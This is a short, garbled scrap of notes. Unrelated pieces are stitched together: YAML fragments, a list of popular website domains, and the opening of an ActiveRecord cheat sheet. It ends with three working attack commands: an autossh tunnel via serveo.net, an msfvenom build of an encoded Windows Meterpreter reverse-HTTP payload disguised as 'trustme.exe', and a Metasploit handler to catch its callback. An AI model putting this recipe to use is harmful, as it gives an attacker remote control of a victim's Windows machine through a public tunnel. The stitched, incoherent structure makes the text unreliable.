adapted from this blog
# YAML
name: Jon# YAML
object:| google.com | |
| youtube.com | |
| facebook.com | |
| baidu.com | |
| yahoo.com | |
| amazon.com | |
| wikipedia.org | |
| google.co.in | |
| twitter.com | |
| qq.com | 
adapted from this blog
# YAML
name: Jon# YAML
object:| ActiveRecord cheat sheet / EXAMPLES | |
| INSTALL | |
| ======= | |
| $ gem install activerecord | |
| in GEMFILE: gem ‘activerecord’ | |
| REQUIRE | |
| ======= | |
| require ‘active_record’ | 
autossh -R trustme:80:localhost:80 serveo.net
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_http LHOST=trustme.serveo.net LPORT=80 --bad-chars “\x00” --encoder x86/shikata_ga_nai --format exe --out $PWD/trustme.exe
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LHOST 0.0.0.0;set LPORT 80;run;"